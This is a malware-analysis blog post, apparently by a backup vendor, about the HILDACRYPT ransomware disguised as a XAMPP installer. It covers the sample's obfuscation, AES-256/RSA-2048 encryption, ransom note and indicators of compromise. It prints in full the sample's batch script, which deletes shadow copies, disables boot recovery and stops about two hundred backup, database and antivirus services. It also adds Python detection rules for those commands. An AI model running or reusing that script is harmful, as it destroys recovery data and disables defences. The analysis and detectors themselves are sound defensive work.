HILDACRYPT: new ransomware hits backup systems and antivirus solutions

Hello, Habr! Once again we are talking about the latest malware release from the ransomware category. HILDACRYPT is a new ransomware, a member of the Hilda family discovered in August 2019, named after the Netflix cartoon that is used to spread the software. Today we will get acquainted with the technical features of this updated ransomware.

In the first version of the Hilda ransomware, the ransom note contained a link to a trailer for this cartoon series posted on YouTube. HILDACRYPT masquerades as a legitimate installer of XAMPP, an easy-to-install Apache distribution that includes MariaDB, PHP and Perl. The cryptolocker, however, has a different file name: xamp. In addition, the ransomware file has no digital signature.

Static analysis

The ransomware is a PE32 .NET file written for MS Windows. Its size is 135 168 bytes. Both the main program code and the packer stub code are written in C#. Judging by the compilation date and timestamp, the binary was created on September 14.

According to Detect It Easy, the ransomware is packed with Confuser and ConfuserEx, but these obfuscators are essentially the same: ConfuserEx is simply the successor of Confuser, so their code signatures match.

HILDACRYPT is indeed packed with ConfuserEx.

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Attack vector

Most likely, the ransomware was found on one of the web programming sites, masquerading as the legitimate XAMPP program.

The entire infection chain can be viewed in the app.any.run sandbox.

Obfuscation

The ransomware's strings are stored in encrypted form. When launched, HILDACRYPT decrypts them using Base64 and AES-256-CBC.

Installation

First, the ransomware creates a folder in AppData\Roaming whose name is a randomly generated GUID (Globally Unique Identifier). It drops a .bat file into this location and launches it via cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

The batch script then starts executing, disabling system features and services.

The script contains a long list of commands that destroy shadow copies and disable SQL servers, backup and antivirus solutions.

For example, it fails to stop the Acronis Backup service. In addition, it attacks backup systems and antivirus solutions from the following vendors: Veeam, Sophos, Kaspersky, McAfee and others.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
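As an added example (not from the original article), a small Python detector that turns the behaviour of the script above into process-creation rules: shadow-copy deletion, disabling of boot recovery, a .bat launched through cmd.exe, and a burst of net stop calls aimed at backup and antivirus services. The event lines are constructed for this example and modelled on the script.

```python
import re
from collections import Counter

# Backup/antivirus service-name fragments the HILDACRYPT batch script above targets.
BACKUP_AV_MARKERS = ("veeam", "sophos", "acronis", "acrsch2svc", "mcafee", "mcshield",
                     "kavfs", "klnagent", "avp", "backupexec", "wbengine", "sqlwriter")
# Behavioural rules over one process command line, derived from the script's actions.
RULES = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("recovery_disabled", re.compile(
        r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("bat_launched_via_cmd", re.compile(r"cmd(\.exe)?\s+/c\s+\S+\.bat", re.I)),
]
NET_STOP = re.compile(r'^\s*net(\.exe)?\s+stop\s+"?([^"]+?)"?\s+/y', re.I)

def classify(cmdline):
    """Return the names of all rules that a single command line triggers."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    m = NET_STOP.search(cmdline)
    if m and any(marker in m.group(2).lower() for marker in BACKUP_AV_MARKERS):
        hits.append("stop_backup_or_av_service")
    return hits

def score_hosts(events, stop_threshold=5):
    """events: iterable of (host, command_line) -> {host: (alert, rule_counts)}. Shadow deletion
    or recovery tampering alerts at once; service stops only as a burst (one stop is routine)."""
    counts = {}
    for host, cmd in events:
        counts.setdefault(host, Counter()).update(classify(cmd))
    verdicts = {}
    for host, c in counts.items():
        alert = (c["shadow_copy_deletion"] > 0 or c["recovery_disabled"] > 0
                 or c["stop_backup_or_av_service"] >= stop_threshold)
        verdicts[host] = (alert, dict(c))
    return verdicts

# Constructed process-creation events (Sysmon event 1 / Security 4688 CommandLine field)
# modelled on the batch script above; ws02 shows ordinary admin activity for contrast.
SAMPLE_EVENTS = [
    ("ws01", "cmd.exe /c JKfgkgj3hjgfhjka.bat & exit"),
    ("ws01", "bcdedit /set {default} recoveryenabled No"),
    ("ws01", "vssadmin Delete Shadows /all /quiet"),
    ("ws01", 'net stop "Sophos Device Control Service" /y'),
    ("ws01", "net stop VeeamBackupSvc /y"),
    ("ws01", "net stop AcronisAgent /y"),
    ("ws01", "net stop McShield /y"),
    ("ws01", "net stop KAVFS /y"),
    ("ws02", "net stop Spooler /y"),
    ("ws02", "vssadmin list shadows"),
]
```

Running score_hosts(SAMPLE_EVENTS) flags ws01 on every rule and leaves ws02 clean; the stop threshold is the knob to tune against your own baseline of administrative activity.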

Once the services and processes listed above are disabled, the cryptolocker collects information about all running processes with the tasklist command to make sure that all the required services are down.

tasklist /v /fo csv

This command outputs the full list of running processes, with fields separated by the "," character:

"csrss.exe","448","services","0","1 896 КБ","unknown","Н/Д","0:00:03","Н/Д"

After this check, the ransomware starts the encryption process.

Encryption

File encryption

HILDACRYPT walks through the entire contents of every hard drive it finds, except for the Recycle.Bin and Reference Assemblies\Microsoft folders. The latter contains dll, pdb and other files critical to .NET applications, which could affect the operation of the ransomware itself. To find the files to encrypt, the following list of extensions is used:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

The ransomware uses the AES-256-CBC algorithm to encrypt user files. The key size is 256 bits and the initialization vector (IV) size is 16 bytes.

In this screenshot, the byte_2 and byte_1 values are generated randomly with GetBytes().

Key

IV

Encrypted files get the HCY! extension. Here is an example of an encrypted file. The key and IV shown above were generated for this file.

HILDACRYPT: ransomware anyar pencét sistem cadangan sareng solusi antipirus

Key encryption

The cryptolocker stores the generated AES key inside the encrypted file. The first part of the encrypted file is a header containing the fields HILDACRYPT, KEY, IV and FileLen in XML format, and looks like this:

The AES key and IV are encrypted with RSA-2048, and the result is encoded with Base64. The RSA public key is stored in the body of the cryptolocker as one of the encrypted strings, in XML format:

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

The RSA public key is used to encrypt the AES file key. It is Base64-encoded and consists of the modulus and the public exponent 65537. Decryption requires the RSA private key, which only the attackers have.

After RSA encryption, the AES key is Base64-encoded and stored in the encrypted file.
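As an added example (not from the article or the sample), a parser for the .NET RSAKeyValue XML container in which such a key is stored, applied to the modulus and exponent quoted above. It assumes the standard layout that RSA.ToXmlString() emits (Modulus and Exponent elements; the wrapping itself is this example's assumption) and reports what an analyst would record: key size, exponent, whether only the public half is present, and a modulus fingerprint for correlating samples.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

PRIVATE_TAGS = ("P", "Q", "DP", "DQ", "InverseQ", "D")   # present only in a private RSAKeyValue

# Modulus and exponent quoted in the article, wrapped in the RSAKeyValue layout that .NET's
# RSA.ToXmlString() produces. The XML wrapping is this example's assumption, not a sample dump.
MODULUS_B64 = (
    "28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqW"
    "dVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408Cv"
    "FapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7"
    "yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fRe"
    "ZcpJonhNZzXztGCSLfa/jQ=="
)
HILDACRYPT_KEY_XML = ("<RSAKeyValue><Modulus>" + MODULUS_B64 +
                      "</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>")

def parse_rsakeyvalue(xml_text):
    """Parse a .NET RSAKeyValue XML string into (modulus, exponent, has_private_part)."""
    root = ET.fromstring(xml_text)
    if root.tag != "RSAKeyValue":
        raise ValueError("not an RSAKeyValue element: %s" % root.tag)
    n = int.from_bytes(base64.b64decode(root.findtext("Modulus")), "big")
    e = int.from_bytes(base64.b64decode(root.findtext("Exponent")), "big")
    has_private = any(root.find(tag) is not None for tag in PRIVATE_TAGS)
    return n, e, has_private

def describe_key(xml_text):
    """Summarise the key the way an analyst would record it: size, exponent, whether the
    sample carries only the public half, and a modulus fingerprint to correlate samples."""
    n, e, has_private = parse_rsakeyvalue(xml_text)
    n_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return {
        "bits": n.bit_length(),
        "exponent": e,
        "public_only": not has_private,   # True: files cannot be recovered from the binary alone
        "fingerprint": hashlib.sha256(n_bytes).hexdigest()[:16],
    }
```

A public_only result confirms the article's point: the binary carries no private component, so the per-file AES keys cannot be recovered from the sample itself.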

Ransom note

After encryption is complete, HILDACRYPT writes an html file to the folders where it encrypted files. The ransom note contains two email addresses through which the victim can contact the attackers.

The extortion note also contains the line "No loli is safe ;)", a reference to anime and manga characters with the appearance of little girls, which are banned in Japan.

Conclusion

HILDACRYPT, a new ransomware family, has released a new version. Its encryption model prevents the victim from decrypting the files encrypted by the ransomware. The cryptolocker uses active measures to disable protection services belonging to backup systems and antivirus solutions. The author of HILDACRYPT is a fan of the Hilda animated series shown on Netflix; a link to its trailer was included in the ransom note of the previous version of the program.

As usual, Acronis Backup and Acronis True Image can protect your computer from the HILDACRYPT ransomware, and service providers can protect their customers with Acronis Backup Cloud. Protection is ensured by the fact that these solutions include cybersecurity that covers not only backup but also our integrated security system Acronis Active Protection, powered by a machine learning model and based on behavioral heuristics, a technology able to counter zero-day ransomware like no other.

Indicators of compromise

File extension HCY!
HILDACRYPTReadMe.html
xamp.exe, with a single letter "p" and no digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Source: www.habr.com